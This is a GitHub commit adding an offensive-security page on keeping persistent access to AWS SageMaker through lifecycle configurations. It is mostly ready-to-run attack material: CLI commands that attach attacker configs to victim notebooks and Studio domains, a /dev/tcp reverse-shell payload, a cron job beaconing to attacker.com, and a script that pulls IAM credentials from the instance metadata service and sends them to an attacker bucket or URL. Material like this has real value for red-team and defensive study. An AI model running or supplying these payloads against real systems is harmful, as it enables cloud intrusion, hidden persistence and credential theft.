Create aws-sagemaker-persistence.md

This commit is contained in:
Ben
2025-07-15 16:46:25 -05:00
committed by GitHub
parent cacc26efe4
commit cfacf65682

View File

@@ -0,0 +1,132 @@
### AWS - SageMaker Lifecycle Configuration Persistence
# Required Permissions
* Notebook Instances: sagemaker:CreateNotebookInstanceLifecycleConfig, sagemaker:UpdateNotebookInstanceLifecycleConfig, sagemaker:CreateNotebookInstance, sagemaker:UpdateNotebookInstance
* Studio Applications: sagemaker:CreateStudioLifecycleConfig, sagemaker:UpdateStudioLifecycleConfig, sagemaker:UpdateUserProfile, sagemaker:UpdateSpace, sagemaker:UpdateDomain
### Note: SageMaker notebook instances are essentially managed EC2 instances configured specifically for machine learning workloads.
## Set Lifecycle Configuration on Notebook Instances
### Example AWS CLI Commands:
*# Create Lifecycle Configuration*
aws sagemaker create-notebook-instance-lifecycle-config \
--notebook-instance-lifecycle-config-name attacker-lcc \
--on-start Content=$(base64 -w0 reverse_shell.sh)
*# Attach Lifecycle Configuration to Notebook Instance*
aws sagemaker update-notebook-instance \
--notebook-instance-name victim-instance \
--lifecycle-config-name attacker-lcc
## Set Lifecycle Configuration on SageMaker Studio
Lifecycle Configurations can be attached at various levels and to different app types within SageMaker Studio.
### Studio Domain Level (All Users)
*# Create Studio Lifecycle Configuration*
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-studio-lcc \
--studio-lifecycle-config-app-type JupyterServer \
--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
*# Apply LCC to entire Studio Domain*
aws sagemaker update-domain --domain-id <DOMAIN_ID> --default-user-settings '{
"JupyterServerAppSettings": {
"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
}
}'
### Studio Space Level (Individual or Shared Spaces)
*# Update SageMaker Studio Space to attach LCC*
aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --space-settings '{
"JupyterServerAppSettings": {
"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
}
}'
## Types of Studio Application Lifecycle Configurations
Lifecycle configurations can be specifically applied to different SageMaker Studio application types:
* JupyterServer: Runs scripts during Jupyter server startup, ideal for persistence mechanisms like reverse shells and cron jobs.
* KernelGateway: Executes during kernel gateway app launch, useful for initial setup or persistent access.
* CodeEditor: Applies to the Code Editor (Code-OSS), enabling scripts that execute upon the start of code editing sessions.
### Example Command for Each Type:
### JupyterServer
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-jupyter-lcc \
--studio-lifecycle-config-app-type JupyterServer \
--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
### KernelGateway
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-kernelgateway-lcc \
--studio-lifecycle-config-app-type KernelGateway \
--studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh)
### CodeEditor
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-codeeditor-lcc \
--studio-lifecycle-config-app-type CodeEditor \
--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
### Critical Info:
* Attaching LCCs at the domain or space level impacts all users or applications within scope.
* Requires higher permissions (sagemaker:UpdateDomain, sagemaker:UpdateSpace) typically more feasible at space than domain level.
* Network-level controls (e.g., strict egress filtering) can prevent successful reverse shells or data exfiltration.
## Reverse Shell via Lifecycle Configuration
SageMaker Lifecycle Configurations (LCCs) execute custom scripts when notebook instances start. An attacker with permissions can establish a persistent reverse shell.
### Payload Example:
#!/bin/bash
ATTACKER_IP="<ATTACKER_IP>"
ATTACKER_PORT="<ATTACKER_PORT>"
nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &
## Cron Job Persistence via Lifecycle Configuration
An attacker can inject cron jobs through LCC scripts, ensuring periodic execution of malicious scripts or commands, enabling stealthy persistence.
### Payload Example:
#!/bin/bash
PAYLOAD_PATH="/home/ec2-user/SageMaker/.local_tasks/persist.py"
CRON_CMD="/usr/bin/python3 $PAYLOAD_PATH"
CRON_JOB="*/30 * * * * $CRON_CMD"
mkdir -p /home/ec2-user/SageMaker/.local_tasks
echo 'import os; os.system("curl -X POST http://attacker.com/beacon")' > $PAYLOAD_PATH
chmod +x $PAYLOAD_PATH
(crontab -u ec2-user -l 2>/dev/null | grep -Fq "$CRON_CMD") || (crontab -u ec2-user -l 2>/dev/null; echo "$CRON_JOB") | crontab -u ec2-user -
## Credential Exfiltration via IMDS (v1 & v2)
Lifecycle configurations can query the Instance Metadata Service (IMDS) to retrieve IAM credentials and exfiltrate them to an attacker-controlled location.
### Payload Example:
#!/bin/bash
ATTACKER_BUCKET="s3://attacker-controlled-bucket"
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME > /tmp/creds.json
*# Exfiltrate via S3*
aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
*# Alternatively, exfiltrate via HTTP POST*
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload